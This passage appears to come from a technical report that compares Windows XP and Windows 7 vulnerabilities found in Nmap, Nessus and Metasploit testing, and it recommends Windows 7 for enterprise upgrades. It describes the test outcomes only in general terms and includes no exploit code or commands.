This is why they are the most dangerous types of vulnerabilities because they require no out-of-the-box user configuration to compromise the system. For instance, installing iTunes, Winamp, or MediaMonkey will make the system vulnerable in certain ways. Users sign-up for these vulnerabilities when the install the programs. Because of this, Metasploit exploit and payload combinations were chosen that target vulnerabilities related to base level functionality like SMB, DCE, and TCP networking. Both systems were equally as vulnerable to actual penetration. Metasploit Tests 1 & 2 were unable to start servers on both the XP and 7 hosts. However, Tests 3 & 4 successfully created servers on both the Windows XP and 7 machines; a server which was able to successfully open a corrupt .wmf or image file when the link to the created server was used. This is particularly odd given the fact that NMap and Nessus reported different open ports and vulnerabilities. Ultimately, both operating systems have exploitable vulnerabilities that are present, even with patching and no superfluous programs installed. The lesson is that removing end-users from

While the aforementioned processes are both issues, the important thing to consider is their presence in the operating systems. These vulnerabilities are not limited to one particular version of the Windows operating system (though Windows 7 does have more low priority vulnerabilities); they are present in both of them. These vulnerabilities exist below average user interaction, so they remain invisible to most users.

PAGE | 72

the picture does not completely remove potential security issues. Only true diligence on the part of the security personnel can truly harden a system.

Windows XP is an industrial, no frills operating system that was revolutionary when it was originally released in 2001. Windows 7 is a multimedia operating system more aimed at the general public than it is at the enterprise. Given the relative ubiquity of Moore's Law, end-users will be more familiar with Windows 7 than Windows XP in a year and a half. As such, it makes sense to begin to learn the Windows 7 platform because it does not lack the base functionality that Windows Vista had. Windows 7 is basically Windows XP with a better user interface, better user access control, and more frills. Microsoft may have neglected to patch some of the existing holes, but they really went back to the drawing board with all the other aspects and it should be integrated into the enterprise upgrade plan.

PAGE | 73